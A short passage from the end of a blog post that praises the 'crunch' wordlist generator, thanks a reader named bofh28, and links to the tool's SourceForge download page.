<br />
<br />
<br />
There are many options and it truly is a great tool.<br />
<br />
<br />
Thanks to bofh28 for reading my ramblings and thanks for this awesome tool !<br />
<br />
<br />
The latest build can be downloaded at ;<br />
<br />
<a href="http://sourceforge.net/projects/crunch-wordlist/"><b>http://sourceforge.net/projects/crunch-wordlist/</b></a>Unknownnoreply@blogger.com156